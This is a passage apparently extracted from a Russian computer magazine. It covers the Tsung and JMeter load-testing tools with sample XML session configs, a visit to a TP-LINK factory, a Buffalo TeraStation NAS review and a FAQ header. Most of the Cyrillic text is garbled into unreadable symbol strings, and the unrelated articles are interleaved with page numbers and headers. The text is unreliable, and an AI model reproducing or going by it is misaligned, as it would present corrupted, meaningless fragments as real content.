!*,6+ ),1,, -,#6,>$, $'()*,%)0 <6"/9&%E $+(:,/0:%A E#+*-'1+$),- % "()'$,-%)0 .*,&+$)$,+ (,,)$,4+$%+ 6+>2" $%6%, <),) .*,&+$) ,.*+2+/9+) -+*,9)$,()0 .*%(-,+$%9 (+((%% E#+*' ,2$,1, %# ":'#'$$?A '1+$),-. F'/++ 3,/++ .,2*,3$, ,()'$,-%6(9 $' $'-()*,;:'A HTTP-(+((%%.

<sessions> <session name="http-session" probability="70" type="ts_http"> <request> <http url="/images/logo.gif" method="GET" version="1.1" if_modifi ed_

!"#$#%&' (%&)*#+,-*./ TCP-%#-0.*-*./ . #&+-&) %-$+-$) 1#,.2-%&+# TCP-%#-0.*-*.3 . #&+-&#+ %-$+-$)

Apache JMeter — !"#$%&'( )*!++,#-".!*/0&&'( $&+"*1/0&", *-2*-3-"'4-0/'( Apache Jakarta Project. 52&-%-#6&! JMeter +!27-4-#+8 )-) +*07+"4! "0+"$*!4-&$8 403-,*$#!90&$(, &! 4 &-+"!8:00 4*0/8 !& +,!+!30& ,*!4!7$"6 &-;*12!%&'0 "0+"' 7#8 JDBC-+!07$&0&$(, FTP, LDAP, SOAP, JMS, POP3, IMAP, HTTP $ TCP. <*=$"0)"1*-, ,!770*9$4->:-8 ,#-;$&' +"!*!&&$= *-2*-3!"%$)!4, ,!24!#80" 7!,!#&8"6 $&+"*1/0&" &!4'/$ .1&)?$8/$. @ ,*!;*-//0 *0-#$2!4-&' /0=-&$2/' -4"!*$2-?$$ 4$*"1-#6&'= ,!#62!4-"0#0(, ,!770*9$4->"+8 ,!#62!4-"0#6+)$0 +0-&+'. A7$&+"40&&'(, &- /!( 42;#87 , &07!+"-"!) 7-&&!;! $&+"*1/0&"- — +!27-4-0/'0 Java-,!"!)$ ,!9$*->" 7!4!#6&! /&!;! ,-/8"$, ,!B"!/1 ,*$ 3!#6C!/ )!#$%0+"40 )!&)1*0&"&'= 2-,*!+!4 !7&!( /-C$&' &07!+"-"!%&!.

456789:47;<4 =7 APACHE

SYN/ACK

!"#$% 09 /164/ 2012134

!"# $%&'($)' %$$&)*&%&)*(($ tsung stop, !"# +,$%-$&,' %&'&.%' $ /$"01*%&)* 23*,$) (' %'4&* — tsung status. 5.,('" %$67&04 +$--*8'*&%# ) /'&'"$9 ~/.tsung/log/yyyymmdd-HH:MM.

:"# 9*(*,';00 HTML-$&1*&$) 0 !0'9,'-- 0%+$"<3.*&%# %/,0+& tsung_stats.pl, *9$ (*$6=$!0-$ 3'+.%/'&< 03 !0,*/&$,00 % "$9$- /$-'(!$4 perl tsung_stats.pl.

!"#"$%"$&#, &'"'()* +(,-'%"#./0," Tsung:• +,$03)$!0&*"<($%&<: ),*-# $&)*&', ),*-# +,0%$*!0(*(0#, &,'(- 3'/;00, 3'+,$%7 ) %*/.(!.;• $>06/0: %&'&0%&0/' +$ )$3),'8*((7- $>06/'-;• +$)*!*(0* %*,)*,': 9,'?0/ 3'(#&$%&0 CPU 0 +'-#&0, %*&0.

@ABCDEFGHF Tsung -$I($ 0%+$"<3$)'&< !"# +,$)*!*(0# %&,*%%-&*%&$) ,'3(7= +,$*/&$) 0 ($)7= +"$8'!$/, ($ ".1>* )%*9$ $( +$!$4!*& !"# &*%&0,$)'(0# )7%$/$('9,.I*((7= %0%&*-. B (*-. -$I($ +,06*9-(.&< !"# $+,*!*"*(0# %&,*%%$.%&$410)$%&0 ,'3($9$ )0!' /"0*(&-%*,)*,(7= +,0"$I*(04, SQL-6'37 0"0 !I'66*,'. G. 0 ('- =)'&0& )%*9$ $!($4 -'>0(7, 1&$67 0-0&0,$)'&< !$%&'&$1($ 6$"<>.2 ('9,.3/.. z

since="Mon, 02 Apr 2012 14:13:32 GMT"/> </request> <thinktime value="20" random="true"/> <transaction name="index_request"> <request> <http url="/index.en.html" method="GET" version="1.1" /> </request> <request> <http url="/logo.gif" method="GET" version="1.1" /> </request> </transaction> <thinktime min="1" max="30" random="true"/> </session> <session name="http-session2" probability="30" ...> … </session></sessions>

J !'(($4 /$(?09.,';00 !)* %*%%00, /$&$,7* )7+$"(#2&-%# % )*,$#&($%&<2 70% 0 30% %$$&)*&%&)*(($. J ('1'"* %*%%00 9*(*,0,.*&%# GET-3'+,$% % +','-*&,$- if_modified_since, !'"** 0!*& ,'(!$-('# 3'!*,I/' thinktime. K$ .-$"1'(02 thinktime 6.!*& %".1'4($* 10%"$ 03 L/%+$(*(;0'"<($9$ ,'%+,*!*"*(0# %$ %,*!(0- 3('1*(0*-, ,')(7- value. G$ -$I($ 3'!'&< +,$-*I.&$/, &$9!' L&$ 6.!*& %".1'4($* 10%"$ 03 ,')($-*,($9$ ,'%+,*!*"*(0# (' !'(($- +,$-*I.&/*. M"*!.280* !)' 3'+,$%' $6N*!0(*(7 ) &,'(3'/;02, L&$ +$3)$"#*& $&%"*I0)'&< %.--',($* ),*-# )7+$"(*(0# &,'(3'/-;00 03 (*%/$"</0= 3'+,$%$).

:'"** 0!*& +,0-*, %*%%00 !"# Jabber’a. O'/ /'/ Jabber (* +',%0& $&)*&, &$ . 3'+,$%' *%&< (*%/$"</$ &0+$) Acknowledgments (+$!&)*,I-!*(04): local — %10&'*&%# +$!&)*,I!*((7-, *%"0 $& %*,)*,' +,0>"$ +$!&)*,I!*(0*, no_ack — %10&'*&%# +$!&)*,I!*((7- %,'3. +$%"* $&+,')"*(0#, global — 0%+$"<3.*&%# !"# %0(=,$(03';00 !*4%&)04 +$"<3$)'&*"*4, ) $%($)($- !"# $I0!'(0# +$!/"21*(0# )%*= +$"<-3$)'&*"*4 +*,*! $&+,')/$4 %$$68*(04 (('+,0-*,, +*,)$9$ %$$68*-(0# $ +,0%.&%&)00). O'/I* 3!*%< +$/'3'(7 ,'3(7* )0!7 %$$68*(04: '.&*(&0?0/';0#, +,0%.&%&)0*, $("'4(, $?"'4(.

<sessions> <session probability="100" name="jabber-example" type="ts_jabber"> <request> <jabber type="connect" ack="local" /> </request> <thinktime value="2"/> <transaction name="authenticate"> <request> <jabber type="auth_get" ack="local"/> </request> <request> <jabber type="auth_set_plain" ack="local"> </jabber> </request> </transaction> <request> <jabber type="presence:initial" ack="no_ack"/> </request> <transaction name="online"> <request> <jabber type="chat" ack="no_ack" size="16" destination="online"/> </request> </transaction> <transaction name="offl ine"> <request> <jabber type="chat" ack="no_ack" size="56" destination="offl ine"/> <request> </transaction> </session></sessions>

BCDE GA MOAPO B$9!' )%* +$!9$&$)0&*"<(7* !*4%&)0# )7+$"(*(7, -$I($ 3'+.-%&0&< ('> &*%&. :"# L&$9$ (*$6=$!0-$ ))*%&0 /$-'(!. tsung start,

TSUNG ! "#$%&' "()*#' '#+%# "(,-,!$,./ 0 #1%,' ,2 $3-4,5 (646%,7 1$8 %)9(32#-%#9# .6!.,(#*)%,8

WWW

• !#1" +(',&"# Tsung: tsung.erlang-projects.org;

• 2(#3$4,%&$, $5",(3,1%6 -/0 Tsung: Sing-Tsung — goo.gl/WNOGR,Tsung GUI — blueend.com/tools/tsungui.

Ñæëìáíá

!"#$% 09 /164/ 2012136

!"#$%&'() *+,+-%$./FERRUM

!"#$%!"#, "&'()*+, "- *) $*) ) "&( (-.) /*) '.01-., )*")'2*', / )3"2( 24 '-(05 6+)(01.&"") 2 !/)")(2-$&'/2 +-472*05 8)+)3)7 9)3"&:&'"); (7*)+)& (&'*)

'+&32 /2*-;'/25 8)+)3)7 6) ):<&(= 6+)(01.&"")8) 6+)247)3-'*7-). 9+2$2"); *)(= :0.) ):+-4)7-"2& 7 &8) +-;)"& '7):)3"); !/)")(2$&'/); 4)"0, $*) 6+27.&/.) 7 8)+)3 2"7&'*2>22, /+=6"0& /)(6-"22 (7 *)( $2'.& 2")'*+-""0&) 2 :).#1)& /).2$&'*7) *+=-3)705 (28+-"*)7.

?4 /)(6-"2;, "-47-"2& /)*)+05 *&:& ()%&* 5)*# $*)-*) '/-4-*# 2 828-"*'/2& "&:)'/+&:0 /)*)+05 (0 2(&.2 $&'*# 723&*# 7) 7+&(, 6+)8=.)/ 6) 8)+)3=, , :0 "-47-. *+2: Huawei, ZTE, TP-LINK. @ 6+&3'*-7.&"22 !*2 /)"*)+0 "& "=%3-A*', — (-.) /*) "& 4"-&* «*&.&B)"0 ' "&6+2.2$"0(2 "-47-"2,(2», «+=''/2& "->2)"-.#-"0& =:2;>0 -;B)")7» 2 "& )$&"# 247&'*"0;, ") "-:2+-AC2; 6)-6=.,+")'*# 7 "-125 6&"-*-5 6+)247)32*&.# +)=*&+)7. D):'*7&"-"), 6)'.&3"2; 2 6+28.-'2. "-' 7 !*) 6=*&1&'*72&. E-, !*2 .A32 4"-.2, $*) "-( '*+-'*# /-/ 5)*&.)'# 6)'()*+&*# "- "-'*),C&& 6+)247)3'*7). 9+)%27-, 7 F)''22, (0 6)3)4+&7-.2, $*) "-/.&2-7-"2& 12.#32/)7 "- 8)*)70& 6+2:)+0 2 /+=6")=4.)7-, ':)+/- 2(6)+*"); -66-+-*=+0 / "-'*),C&(= 6+)247)3'*7= "& )*")'2*-',, 6)!*)(= (0 (&$*-.2 748.,"=*# "- *), /-/ 6&$-*-A*', 6.-*0, 76-27-A*', !.&/*+)""0& /)(6)"&"*0, 6+272"$27-A*', -"*&""0 2 '):2+-A*', /)+6='-. ? 7'& !*) :0.) "-( 6+)3&()"'*+2+)7-").

@6+)$&(, "&/)*)+0& )*/+)7&"2, "-' 6)'*28.2 &C& 3) *)8), /-/ "-12 -7*):='0 7<&5-.2 "- *&++2*)+2A B-:+2/2. @)-6&+705, (0 =723&.2 B-:+2$"0& ):C&%2*2,. G-/ >272.24)7-""0; ()'/-72$, 6+)1&312; 7 '7)& 7+&(, 3)'*);"=A 4-/-./= 7 F)''2;-'/)( ="27&+'2*&*& 3+=%:0 "-+)3)7, , "&(")%/) "& 6)-3+=8)(= 6+&3'*-7.,. '&:& *262$")& ):C&%2*2&... H)$"&&, , 6+&3'*-7.,. &8) /-/ =8)3"), ") *).#/) "& /-/ $2'*)& (")8)!*-%")& 43-"2&

D*+-"-, /)*)+-, 4-"2(-&* .232+=AC2& (&'*- 6) /)-.2$&'*7= 6+)247&3&""); (-.7-+2. I3&'# 7'&83- ()%") "-;*2 -:=4)='*);$270; 5)'*2"8, 2 43&'# %2-7&* /=$- 6+)8+-((&+)7 2 5-/&+)7 — )* )*/+)7&"") '.-:05 3) 6+)B&''2)"-.)7 70')/)8) =+)7",. I3&'# .)(-A* 6+)8+-((0, '*-7,* ("& *).#/) ')B*7&+"0&) 4-/.-3/2 2 )*'A3- ='*+-27-A* DDoS’0. E., "-'*),-C&8) -;*21"2/- 43&'# ')43-"0 7'& ='.)72, — "--6+2(&+, B&;':=/ 2 *72**&+ )*'&$&"0 7&.2/2( "->2)-"-.#"0( B-;+7).)(, $*) "& ()%&* "& '/-407-*#', "- 6+)247)32*&.#")'*2 *+=3- /)(6#A*&+C2/)7.

!"#$%&" %$'()*%&" +,&$-!&.*'!&

%/#0'/,12" $**#".&!(1$3 4,('*%&5& %$'(3 ! +&#0-/ $-!"*'1&5& 6/,1(#( «7(%",»

&

!"#$%&" %$'()*%&" +,&$-.&/*'.&

137!"#$% 09 /163/ 2012

* %&0/$1$&0",(2$ 3 %(4/&5& &%0( $ +& #$0""6%" ,(-."7(0082 0( &%0(9 :"#;"2. !&-2&40&, %&0"60&, 6'& <'3 *(23= &/"4/3 '(% +&."*$#$ +& %&2(0/" +","/ +,$:8'$"2 $0&*',(00&) /"#"5(1$$, 0& %&0',(*' 2"4/3 &'"6"*'."0082$ $ %$'()*%$2$ &:>(5(2$ :8# .+"6('#?=>. !+,&6"2, 9.('$' &: &:>(5(9 — . %&01" %&01&., .03',; 28 .*" ,(.0& 0" -(9&/$#$. @ .&' .03',; -(.&/( — 6","- +&/A"-/, 3%,(7"008) %32(6&.82 -0(2"0"2 * 0(/+$*;= «B&:,& +&4(#&.('; 0( C(:,$%3 TP-LINK», — 28 /")*'.$'"#;0& +,&0$%-#$. D(% *#"/3"' +,&-&2:$,&.(.7$*; +,"-"0'(1$"), %&'&,(? ,(*-*%(-(#( 0(2 & +#(0(9, /&*'$4"0$?9 $ +",*+"%'$.(9 %&2+(0$$, 28 &'+,(.$#$*; '3/(, 5/" '($#&*; .*" *(2&" $0'","*0&", — 0( -(.&/.

E(.&/ &%(-(#*? 0( ,"/%&*'; 6$*'82 $ &+,?'082. ! +,$01$+", <'& *&.",7"00& #&5$60&, 6'& <#"%',&008) -(.&/ /&#4"0 :8'; 6$*'82, — +,&*'& *&-0(0$" 6"#&."%(, %&'&,8) +,$.8% % -/(0$?2 1960-9 5&/&. +&*',&)%$, .8:$'82 -(.&/*%$2 &%0(2 $ */(=>$2*? +&/ &C$*8 +&2">"0$?2, /&#40& :8#& (/(+'$,&.(';*? % <'&) 0&.&) ,"(#;0&*'$. F(-32""'*?, :"'&0089 -(:&,&. * +3>"00&) +&.",93 &1$0%&.(00&) %&#=6") #"0'&) «G5&-(» 28 '&4" 0" &:0(,34$#$.

H",.82 /"#&2 28 3.$/"#$ *%#(/. I%#(/ :8# *&.",7"00& &:86082 — (0'$*'('$6"*%$" +&%,8'$?, $/"(#;0& ,&.0& ,(*-+&#&4"008" *'"##(4$, +,&032",&.(008" $ '>('"#;0& 36'"008" -(+(*08" 6(*'$. H,$0$2(? .& .0$2(0$" *',&5&*'; %$'()*%&5& -(%&0&/('"#;*'.( $ 0(7" 3.(4"0$" % 5&*'"+,$$2082 9&-?".(2, 0$%'& $- 0(7") <%*+"/$1$$ 0( *%#(/" 0$6"5& 0" *+",.

! "#$%& '(&)* +,-.$ Windows XP, Google Chrome # Mozilla. Win7 . )#/0& )& 1#0&+ — )# )% 23'#41'05$1&, )# 1 3&5$'3%)%6.

"'+#(&5$1' )%5$'.7#6 iPhone 4S, Galaxy S3 # $'2'186 HTC 9 2%55%:#3'1 ;&$3' 1 <')=')/& 2'3%:%&$ 1''-3%:&)#&. >&18& =#$%?5=#& (6&-6&) 5;%3$@')8 15$3&(%,$5. '(&)* 3&0='…

!'0.$ 1 "#$%& 3&4(&, (&; 1 A13'2&, )' (9$* 52'='?)&&, (&; 9 )%5. B%49;&&$5., 1 $3# 3.0% )& 2%3=9,$5. # 5 (&$83&6 3.0'1 )& 2'1'3%(#-1%,$.

! "#$%& &5$* 2'+#C&?5=#& 1&+'5#2&08. D-8()' ')# 23'5$' 5$'.$ )% $3'$9%3& # ;#/%,$ 23'-+&-5='18;# ;%.(=%;#, 51#0&$&+*5$19. ' $';, ($' =%(&5$1&))8& %==9;9+.$'38 1 "#$%& #;&,$5..

E&$3' /'3'0% <')=')/% 90#1#$&+*)' 23'5$'3-)'&, 5)%-:&)' 1&5*;% 2'03'-)8;# =%3$%;#, % 15& '5$%)'1=# $%; '-F.1+.,$5. )% %)/+#?-5=';. ! '-7&;, &5+# $&-& 4%6'(&$5. 53%1)#$* ;&$3' <')=')/% 5 ;&$3'2'+#$&)'; #;. !. G. >&-)#)%, $' 2'5+&0)#? ;':&$ -8$* '-F.1+&) 2'-&-0#$&+&; #5=+,(#$&+*)' 1 =%$&/'3## «"9+*$93-)'& )%5+&0#&».

H/)&$&))8& /3%:0%)& "IB )%; $':& 15$3&(%-+#5* — 1&(&3%;# ')# 5F&4:%,$5. )% /394'186 1&+'5#2&0%6 ()#(&/' 5;&J)'/', =5$%$#) )% 5$#6#?)8& 38)=#, 0'5$%,$ 23'2%)'18& -%++'-)8 # /#/%)$5=#& =%4%)8 # )%(#)%,$ $'3/'1%$* &0'? # 15.='? ;&+'(&1='?.

B8)=# +&1'/' $'1%3% 1 "#$%& $':& &5$*, )' )% @')& 12'+)& '@#C#%+*)86 ;'++'1 )%?$# #6 )& $%= 23'5$'. K%$' $%; ;':)' =92#$* $&+&@') 5 )%02#5*, «Zopo» )% -'3$9 # 6%3%=$&3#5$#-=%;#, -+#4=#;# = @+%/;%)5=#; 5;%3$@')%; 5'13&;&))'5$#. E&)*J& (&; 4% 200 -%=5'1.

"'/0% 1 '0)'; 3&5$'3%)(#=& . '-)%39:#+ '$'31%))9, # 23#5+')&))9, = 5$&)& 01&3* # '$-59$5$1#& ;8+% )% 3%='1#)&, . #528$%+ '5$38? 23#5$92 )'5$%+*/##.

!"#$%$&"'$ ()*#'

!"#$%"&%'(& )#'#$*& !"#+,-./& +#$#012# (,"#$# — -*3+45 "#,'%" !#+-067*6' - '%('/",68%5 *!!*"*',"% / 9*(#$4$*6' $ -*:%",, -#'#"*& #!"%+%0&%' ;:-/90,7%2/%

FERRUM

!"#$% 09 /164/ 2012138

!"#$% %& '$($)*+ , -$., /0$ 123+("4# ,"5-6"5-(27#$(&. 8/(2%92$ '2%$:$9+$. ;"3*+-& + 1.$%&, '2<"=&,"4:+$ ="'7#"99&$ 2#92)$9+> , ,$(#+<"*+ =",201<25 ,*"1#+ + 2123$9921#+ #$.'(2-$11". ? 9"<29$-, <29,$5$(. !0$1@ ,$1@%" '(+*+A92/2 ,+0" ("32A+$ (,2,1$, <1#"#+, 9$ '2.2B+$ 9" 7/9$#$99&. <+#"51<+. 023(2,2*@-$,) '($#,2(>4# , B+=9@ C*$<#(2#$.9+A$1<74 %&1*@. D'291<+$ 1#"9<+, <2#2(&$ 9"921># C*$<#(2'(2,20>:+$ -$'+. E$ '$(,25 1,$B$1#+, 92 ,'2*9$ $:$ 320(&$. F$9#" <29,$5$(" 9$1$# /2#2,&$ '*"#& < 71#"92,:+<"% C*$<#(299&. <2%'29$9#2,, '$($0"$# +. , "''"("# 0*> '"5<+, , 23G>#+> #$#$9$<, <2#2(&$ 2#<7-1&,"4# ,&1#7'"4:+$ 92B<+ + 02'"+,"4# #2, 1 A$% 9$ 1'("-,+*"1@ "''"("#7(", ="#$% < '(+<(7A+,"*@:+<"% "9#$99, 71#"92,:+<"% , <2('71" (0>0$9@<", #($%> A$#<+%+ 70"("%+ 23($=+9$992/2 %2*2#<" 123+("4:+5 <2('71, 3&1#(2 1#"* 9"(209&% *43+%-$%) +, 9"<29$-, , (7<+ 12#(709+<2, 8;H. I(2,$(>$#1> /2#2,"> '(207<-+> 02,2*@92 17(2,2 — <"B0&5 (27#$( '20<*4A"4# < #$1#+(74:$5 "''"("#7($ + ="12,&,"-4# , <"%$(7, <2#2("> 2'($0$*>$# JK-+=*7A$9+$.

L'(2A$%, 9$ 209+% <29,$5$(2% B+,2 '(2+=,201#,2. I2%+%2 =",20", %& '23&,"*+ , 2192,92% =0"9++ <2%-'"9++, /0$ <+'+# %&1*@ ("=("32#A+<2, — +9B$9$(2, + '(2/("%%+1#2,. L 32*@)+91#,$ 1*7B$39&. '2%$:$9+5 62#2/("6+(2,"#@ 3&*2 9$*@=>, 92 <2$-A#2 +9#$($19$9@<2$

%& #"% 7,+0$*+. L2#, < '(+%$(7, 2#0$*, , <2#2(2% ="-9+%"4#1> 1*2%",)+%+1> +*+ 9$ '(2)$0)+%+ '(2,$(<7 (27#$("%+. H"="*21@ 3&, '"(9+ + 0$,7)<+, '(+<2,"99&$ < 1,2+% ("32A+% %$1#"% ="=$%*$99&%+ 3("1*$#"%+, '(21#2 23>="9& +%$#@ <7A7 <71#"(9&. '(+1'2123*$9+5. I(+'25 , <291$(,925 3"9<$, 97 .2#> 3& 0$(B"#$*@ 0*> '">*@9+<" += 1#"*+1#25 '(2,2*2<+! E2 9$#. L1$ '(+32(& + %"#$(+"-*& — )#"#9&$ + 2A$9@ '(+*+A9&$. 81#",+, 9"0$B07 9"5#+ =0$1@ '(+=9"<+ (711<25 9"(20925 C*$<#(2#$.9+<+, %& 9"'(",+*+1@ , 2#0$*, /0$ +1'&#&,"4# '(2+=,20+%74 #$.-9+<7. 8#*+A9"> %&1*@ — '(2,$(<" , 17.2B"(2,2% )<"67. M27#$(&, ="1797#&$ , 17.2B"(2,25 )<"6 1 ,&1#",*$9925 #$%'$("#7(25 60 /("0712,, (2B0"4# "112-+"-+4 1 N,"(--$9$//$(2% += «H("1925 B"(&». H2#2(&5 ,<*4A"$# (27#$( , (2=$#<7 + /2,2(+#: «O1*+ #& ("32#"* 9" *+#$592%, #2 '(+-,&< < B"($!»

L1$ 21#"*@9&$ '(2,$(2A9&$ 1#$90& 9$ 1#2*@ C'+A9&. H7A" =,7<2+=2*+(2,"99&. '2%$:$9+5 + '(2A+. <*$#2< P"("0$>, 1#$90& 1 32*@)+% <2*+A$1#,2% 232(702,"9+>, <2#2(2$ '(2,$(>$#1> 9" 12,%$1#+%21#@ 1 '(2+=,20+%&%, '(2,$(<" 9" ("32#7 ,2 ,*"B9&. 71*2,+>. + .+#(&5 '(+32(, 1+%7*+(74:+5 1#"#+A$1<2$ C*$<#(+A$1#,2... E",$(92$, .2(2)"> )#7<" — '(2,$($99&5 $5 (27#$( ,&0$(B+# *4374 /(2=7. !"#2 ,&/2(+# '20<*4A$99"> < 9$%7 1$#$,7." ;).

L2# #"<, )"/ =" )"/2% + <2%9"#" =" <2%9"#25, ="<29-A+*"1@ 9")" C<1<7(1+> '2 6"3(+<$ TP-LINK. L'$($0+ 9"1 B0"*+ 23&A9&$ C<1<7(1++, 23$0&, 7B+9& ('2(25 0"B$ 1 (711<25 ,20<25) + '(2A+$ %$(2'(+>#+>, 9"%$<"4:+$ 9"%, A#2 ,21#2A92$ /21#$'(++%1#,2 — 9$ '71#25 =,7<. L'(2A$%, ,1$ C#2 3&1#(2 ="<29A+*21@...

Q<,2=@ 1#$97 #(2'+A$1<2/2 *+,9> (<2#2(&5 2#*+A"$#1> 2# 23&A92/2 #$%, A#2 =" 9$1<2*@<2 1$<790 , 9$% #& ,&%2-<"$)@ 02 9+#<+) <2('2("#+,9&5 #("91'2(# 021#",+* 9"1 9" (20+97 R(41" F+ + SB$<+ T"9" — U29<29/, 2#<70" 1"%2-*$# <2%'"9++ 79$1 9"1 , 1#("97 ,$A92=$*$9&. '2%+02(2,, ,$A92#$%9&. '20G$=02, + ,$A92#$<7:+. <("92,. U0$ =" '2*A"1" '2$=0<+ , "C(2C<1'($11$ 02 I",$*$-<2/2 ,2<="*" %& , '2*925 %$($ <2%'$91+(2,"*+ #2# ,+=7"*@9&5 0$6+-+# 3$#299&. ="32(2, 1 <2*4A$5 '(2,2*2<25, 3"(0"<", ("1'"0" + /("66+#+, <2#2(&5 ,1$ C#+ 09+ '201'7092 , 9"1 9"<"'*+-,"*1>. z

139!"#$% 09 /164/ 2012

!"#$$% &$'"()FERRUM

BUFFALO

TeraStation TS5400D !"#$" "%&'$()"*'+, -.%*.% *(/."-$'012/.$(3. 4 5"!61.5+. (/.+ 1(7.$)(3 $' "/$8 5'!.%8, ' +'5#. )'3*1.$' 6"//.%#5' 0"1.. 1200 !"/.1.9 5'!.% "+ 184 6%"()*"/(+.1.9. :"$.;$" #., Buffalo TeraStation TS5400D (!..+ 6"//.%#58 6%($+--.%*.%'.

<+!.+(!, ;+" 5"$-+%857(3 $'5"6(+.13 6%./6"1'&'.+ *$8+%.$$.. %')!.=.$(. 01"5' 6(+'$(3. >' $'? *)&13/, @+" 0"1.. %')8!$". %.?.$(., $.#.1( (-6"1,)"*'$(. *$.?$.&" '/'6+.%' 6(+'$(3. 4"-6.%*AB, !A ()0'*13-.!-3 "+ 0"1,?"&" 6%"*"/'. 4"-*+"%AB, 01"5 6(+'$(3 6"18;'.+ '5+(*$". "B1'#/.$(.. C%"()*"/(+.1, /'#. $. 6"0"31-3 /'+, $' 8-+%"9-+*" +%( &"/' &'%'$+((.

4D4<E C"!(!" «#.1.)$"9» -"-+'*132=.9, $. *A)A*'2=.9 $'-%.5'$(9, -+"(+ "+/'+, /"1#$". ( 6%"&%'!!(-+'!, +%8/3-=(!-3 $'/ 6%"?(*5"9 Buffalo TeraStation TS5400D. F"+3 0A )' +", ;+" *-. 8;+.$" /" !.1";.9. G'5#. 6%"&%'!!$". "0.-6.;.$(. 6")*"13.+ (-6"1,)"*'+, $'5"6(+.1, 5'5 /8?. 8&"/$". H!.$$" 6"@+"!8 Buffalo TeraStation 5400 $.1,)3 "/$")$';$" "+$.-+( 5 "6%./.1.$$"!8 51'--8: -.%*.% 08/.+ B"%"? 5'5 /"!', +'5 ( * "I(-.. z

-+%"9-+*' NAS 8#. /'*$" 6.%.-+'1( 0A+, ;.!-+" $."0A;$A!, -1"#$A! ( /'1.5(! ( /13 /"!'?$.&" (-6"1,)"*'$(3, ( /13 6%(!.$.$(3 * $.0"1,?"!

"I(-.. 4 $'? *.5, 5"&/' -.+.*A. +.B$"1"&(( %')*(*'2+-3 08%$A!( +.!6'!(, 120"9 8*'#'2=(9 -.03 6"1,)"*'-+.1, 6%"-+" "03)'$ (!.+, -.+.*"9 $'5"6(+.1,. >' %A$5. 6%(-8+-+*8.+ !$"#.-+*" !"/.1.9 6"%+'+(*$AB -.%*.%"* - %')1(;$A! «#.1.)"!» ( 6%"?(*5'!(. J.&"/$3 #. %.;, 6"9/.+ " 6%"()*"/(+.1,$"! %.?.$((, 6%./$')$';.$$"! /13 SOHO--.&!.$+', — Buffalo TeraStation TS5400D.

Buffalo TeraStation TS5400D (!..+ *$.?$(9 @5%'$, 6"@+"!8 6"1,)"*'+.12 $. 6%(/.+-3 5'#/A9 %') "0-%'='+,-3 5 «'/!($5.» * 6"(-5'B +"9 (1( ($"9 !.1";(. >' )'/$.9 -+.$5. Buffalo TeraStation TS5400D %'-6'3$" -%')8 ;.+A%. USB-%')K.!', /*' () 5"+"%AB 6%"&%.--(*-$"&", +%.+,.&" 6"5"1.$(3. L3/"! - $(!( %'-6"1"#(1(-, /*' &(&'0(+$AB 6"%+' Ethernet ( 6"%+ /13 86%'*1.$(3 (-+";$(5"! 0.-6.%.0"9$"&" 6(+'$(3. 4 7.1"! *$.?$(9 *(/ -.+.*"&" $'5"6(+.13 $. (!..+ 5'5(B-1(0" $./";.+"*. NAS /13 "I(-$"&" -.&!.$+' *A&13/(+ -+%"&" ( 1'5"$(;-$". H$+.%I.9- 86%'*1.$(3 6%"-+ ( 6"$3+.$.

J.%/7.! "0$"*1.$$"9 1($.95( Buffalo TeraStation TS5400D 3*13.+-3 /*8BK3/.%$A9 6%"7.--"% Intel Atom D2550. M(6 I8$57("$(%8.+ $' ;'-+"+. 1,86 NN7, (!..+ /*' I()(;.-5(B 3/%', 1 O0 5.?' ( 6"//.%#(*'.+ +.B$"1"&(2 Hyper-Threading. E', 5'5 6"5')'1" *%.!3, 6%"7.--"%A, 6.%*"$';'1,$" %')%'0"+'$$A. /13 $.++"6"* ( $.+085"*, "+1(;$" )'%.5"!.$/"*'1( -.03 ( * &"+"*AB NAS. 4./, 6"!(!" *-.B 6.%.;(-1.$$AB B'%'5+.%(-+(5 Intel Atom D2550 (!..+ +.61"6'5.+ *-.&" 10 4+. C%"7.--"% *!.-+. - 2 N0 "6.%'+(*$"9 6'!3+( -+'$/'%+' DDR3 -")/'.+ *.-,-!' ( *.-,!' 6%"()*"/(+.1,$A9 +'$/.!. O"=$"-+( +'5"&" #.1.)' B*'+(+ $' $.-5"1,5" 1.+ 6"-+"3$$"&" (-6"1,)"-*'$(3 ( -!.$8 $. "/$"&" 6"5"1.$(3 6%"?(*"5.

Buffalo TeraStation TS5400D !"#.+ 6"-+'*13+,-3 - 5"!61.5+"! #.-+5(B /(-5"* .!5"-+,2 "+ 1 /" 4 G0. P+" 6.%*". B%'$(1(=. 5"!6'$((, &/. 6%(!.$32+-3 /(-5( +'5"&" 0"1,?"&" "0K.!'. H!.3 * %'-6"%3#.$(( ;.+A%. HDD, !A !"#.! "%&'$()"*'+, !'--(* RAID 8%"*$3 0, 1, 5, 6 ( 10, ' +'5#. 6"18;(+, $.6"-%./-+*.$$A9 /"-+86 5 $'5"6(+.13! * %.#(!. JBOD. Buffalo TeraStation 5400 6"//.%#(*'.+ &"%3;82 )'!.$8 /(-5"*, ;+" $. !"#.+ $. %'/"*'+,, "-"0.$$" * 8-1"*(3B 6"-+"3$$"&" I'91"-"0"%"+' * "I(-.. C"//.%#5' iSCSI +'5#. &"*"%(+ $'! " 0()$.--$'6%'*1.$$"-+( 8-+%"9-+*'. J 6"!"=,2 Buffalo

TERASTATION TS5400D

&$!'()$*#($ !"%"#&$%(*&(#(

*+,-+#+./" (/"0123 1$4/ . +516%7#+45$): 1 G0, 2 G0, 3 G0, 4 G08"/4$,"%7#23 +'96,: /" 16 G0:(+)644+(: Intel Atom D2550;-6("5$.#"< -",<57: 2 N0, DDR3=%+52 1%< HDD: 4 RAID: 0/1/5/ /6/10>"?96,2: 2 B RJ-45 10/100/1000 O0(+/-, 2 B USB 2.0, 2 B USB 3.0=656.26 -(+5+/+%2: TCP/IP, DHCP, CIFS/SMB, AFP, NFS, HTTP, HTTPS, FTP, NTP, Jumbo-5'/%A=6(.$42: Amazon S3, Access Link, NovaBACKUP, DLNA Media Server, BitTorrent, 6%($+--.%*.%, -.%*.% *(/."$'012/.$(3, Apple Time Machine:+116(0/" iSCSI: .-+,>"?,6(2: 231 B 170 B 216 !!8"44": 8 5&

NAS’! " #$%%!

+

!"#$% 09 /164/ 2012

FAQ!"#$ %#&$'( (cherboff@gmail.com)

)(*#+,- .#/"'( (twitter.com/neyolov)

140

Immunity Debugger searchcrypt!"#$%&'(%', )*+,-.'' ) #/"(,"&/(01 ("2+&, ("3%#"((+' (" Python % 4+-

